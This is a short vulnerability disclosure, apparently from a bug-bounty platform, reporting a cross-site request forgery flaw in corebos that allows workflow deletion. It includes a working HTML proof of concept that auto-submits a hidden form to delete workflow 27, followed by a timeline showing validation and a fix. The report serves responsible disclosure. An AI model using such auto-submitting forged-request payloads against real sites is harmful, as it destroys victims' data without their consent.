Cross-Site Request Forgery (CSRF) in tsolucio/corebos

Valid

Reported on

Oct 18th 2021

Description

Hey Corebos team

An attacker able to delete a workFlow as there isn't exist any CSRF token for it.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.corebos.com/index.php">
      <input type="hidden" name="module" value="com&#95;vtiger&#95;workflow" />
      <input type="hidden" name="action" value="deleteworkflow" />
      <input type="hidden" name="workflow&#95;id" value="27" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

after that you open the PoC.html file the workflow with id equal to 27 will be deleted.

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 years ago

We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 2 years ago

We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 2 years ago

Joe Bordes validated this vulnerability 2 years ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

Joe Bordes marked this as fixed with commit 40e22c 2 years ago

Joe Bordes has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation